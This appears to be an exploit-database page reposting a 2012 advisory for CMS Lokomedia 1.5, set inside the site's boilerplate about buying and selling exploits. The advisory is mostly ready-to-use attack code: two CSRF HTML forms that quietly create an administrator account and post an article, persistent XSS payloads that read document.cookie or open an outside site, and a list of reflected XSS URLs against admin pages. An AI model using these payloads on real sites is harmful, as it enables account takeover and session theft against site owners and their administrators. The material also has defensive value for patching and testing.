0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
CMS Lokomedia - CSRF/XSS Vulnerability
1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 0 0 [x] Official Website: http://www.1337day.com 1 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 0 0 1 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0 0 I'm NuxbieCyber Member From Inj3ct0r TEAM 1 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx <<<:>>> CMS Lokomedia - CSRF/XSS Vulnerability <<<:>>> xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ./Title Exploit : CMS Lokomedia - CSRF/XSS Vulnerability ./CMS Version : Lokomedia - Version: 1.5 ./Software Link : www.bukulokomedia.com ./Author Exploit: [ TheCyberNuxbie ] ./Security Risk : [ Medium Level ] ./Category XPL : [ WebApps/ZeroDay ] ./Time & Date : June, 21 2012. 06:27 AM. ./System Tested : Windows 7 Ultimate, Firefox 9.0.1, Xampp-win32-1.7.3 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ############################################################################ # - POC: # 1.1 Exploit - CSRF (Add Admin). # 1.2 Exploit - CSRF (Add Article). # 2.1 Presistent XSS (module=hubungi). # 2.2 Reflected XSS. ############################################################################ # # 1.1 Exploit - CSRF (Add Admin): # # <html> # <head> # <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> # <title>CMS Lokomedia - CSRF Add Admin Exploit</title> # </head> # <body> # <form method="POST" action="http://lokomedia/adminweb/modul/mod_users/aksi_users.php?module=user&act=input" enctype="multipart/form-data"> # <input type="hidden" name="username" value="nuxbie"> # <input type="hidden" name="password" value="nuxbie"> # <input type="hidden" name="nama_lengkap" value="nuxbie"> # <input type="hidden" name="email" value="root@31337sec.com"> # <input type="hidden" name="no_telp" value="0271"> # <input type="submit" value="SAVE"> # <input type="button" value="CANCEL" onclick=self.history.back()> # </form> # </body> # </html> # # [ End Of Code ] # # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # # # 1.2 Exploit - CSRF (Add Article): # # <html> # <head> # <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> # <title>CMS Lokomedia - CSRF Add Article Exploit</title> # </head> # <body> # <form method="POST" action="http://lokomedia/adminweb/modul/mod_berita/aksi_berita.php?module=berita&act=input" enctype="multipart/form-data"> # <input type="hidden" name="judul" value="New Article With CSRF"> # <select name="kategori"> # <option value=21></option> # <input type="hidden" type=radio name="headline" value="Y" checked> # <input type="hidden" type=radio name="publish" value="N"> # <textarea name="isi_berita"> # [ PASTE YOUR NEW ARTICLES ] # </textarea><br> # <input type="file" name="fupload"><br> # <input type="submit" value="SAVE"> # <input type="button" value="CANCEL" onclick=self.history.back()> # </form> # </body> # </html> # # [ End Of Code ] # # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # # 2.1 Presistent XSS (module=hubungi): # # [ Sample XSS Script ] # <script>alert('31337');</script> # <script>alert(document.cookie);</script> # <script>window.open("http://www.1337day.com/")</script> # , etc... # # - Go to: http://Lokomedia/hubungi-kami.html # Post your messege with script XSS In any of the text fields. # For this we used the captcha verification for the following messege (Presistent XSS). # # - Input Verification "captcha"... # "Kirim" (send this messege). # # - Messege From WebApps: # "Terima kasih telah menghubungi kami. Kami akan segera meresponnya." # # - Then if a ADMIN visits your page module "hubungi". # http://Lokomedia/adminweb/media.php?module=hubungi <--- If Admin View This Page, The Script XSS Will Execute. # # [ Presistent XSS Has Been Succesfuly (execute) ] # # 2.2 Reflected XSS: # http://lokomedia/adminweb/media.php?module=berita&halaman=<script>alert(document.cookie);</script> # http://lokomedia/adminweb/media.php?module=agenda&halaman=<script>alert(document.cookie);</script> # http://lokomedia/adminweb/media.php?module=download&halaman=<script>alert(document.cookie);</script> # http://lokomedia/adminweb/media.php?module=templates&halaman=<script>alert(document.cookie);</script> # http://lokomedia/adminweb/media.php?module=galerifoto&halaman=<script>alert(document.cookie);</script> # # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # # - Special Thanks: # ...:::' 1337day - Inj3ct0r TEAM ':::... # BoSs r0073r & All 31337 Member Inj3ct0r TEAM,,, # , And All Inj3ct0r Fans & All Hacktivist,,, # ################################################################################# # [ Inj3ct0r | PacketStromSecurity | Exploit-ID | Devilzc0de | SekuritiOnline ] # # [ Codenesia | ID-BackTrack | IndonesianCoder | IndonesianHacker | JatimCrew ] # # [ E-C-H-O | ExploreCrew | Hacker-Newbie | Jasakom | YogyaCarderLink ./etc.. ] # # -------------------[ We Are c0d3rs And We Are An Exploit ]------------------- # # [ r0073r, Sid3^effects, r4dc0re, CrosS, SeeMe, indoushka, KnocKout, ZoRLu ] # # [ anT!-Tr0J4n, KedAns-Dz, Kalashinkov3, Angel Injection, Sammy FORGIT, NoGe ] # # [ cr4wl3r, eidelweiss, v3n0m, g3mb3lz_YCL, team_elite, Hmei7, kaMtiEz, c4uR ] # # [ cyberlog, y3dips, K-159, the_day, irvian, k1tk4t, b374k, EA Ngel, OoN_Boy ] # # [ mywisdom, Flyff666, YaDoY666, jos_ali_joe, Vrs-hCk, OLiBekaS, vYc0d s4va ] # # [ Elmonny, Dencowbie, Cyberbag0r, r4h0x, SeekerUnZero, AfniGates, ./etc.. ] # ################################################################################# # 0day.today [2024-12-26] #